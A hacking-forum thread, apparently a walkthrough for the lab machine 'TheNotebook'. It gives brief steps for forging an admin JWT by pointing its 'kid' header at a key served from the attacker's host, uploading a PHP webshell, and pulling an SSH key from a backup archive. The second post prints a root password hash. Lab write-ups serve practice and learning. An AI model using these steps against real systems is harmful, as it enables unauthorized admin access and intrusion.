TUTORIAL TheNotebook writeup
by F4nny - March 07, 2021 at 03:49 PM
#1
1. jwt

Register a account , paste your cookie it to jwt.io , edit the payload like this.


Quote:{
  "typ": "JWT",
  "alg": "RS256",
  "kid": "http://yourip:7070/privKey.key"
}


{
  "username": "xxx",
  "email": "[email protected]",
  "admin_cap": 1
}

Generate a pair of rsa key, and paste your pubkey & privkey into jwt.io. 
Generate a new cookie.

Quote:python3 -m http.server 7070

Edit your cookie. Fresh the browser and you're admin.

2. Simply upload a php webshell in admin panel.

3. Find backup file in /var/backups/home.tar.gz , untar it and you get a id_rsa.

id_rsa Hidden Content
You must register or login to view this content.


3. root part and root hash


Hidden Content
You must register or login to view this content.
#2
Writeup : https://hackingwebservice.wordpress.com/...k-writeup/

Hash :
$6$OZ7vREXE$yXjcCfK6rhgAfN5oLisMiB8rE/uoZb7hSqTOYCUTF8lNPXgEiHi7zduz1mrTWtFnhKOCZA9XZu12osORyYnKF.
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Redistributing or uploading any Hidden Content to third party websites without the authorisation of the Owner of said content will result in a permanent ban.

Possibly Related Threads…
Thread Author Replies Views Last Post
BUYING Endgame Ascension complete writeup AND / OR Odyssey complete writeup peteristderlustig 3 1,001 October 03, 2021 at 05:21 PM
Last Post: Decosta
SELLING TheNotebook Writeup egotisticalSW 1 741 June 23, 2021 at 06:13 PM
Last Post: Jimmy02
TUTORIAL TheNotebook sentinela 0 598 June 07, 2021 at 11:00 PM
Last Post: sentinela

 Users browsing this thread: 1 Guest(s)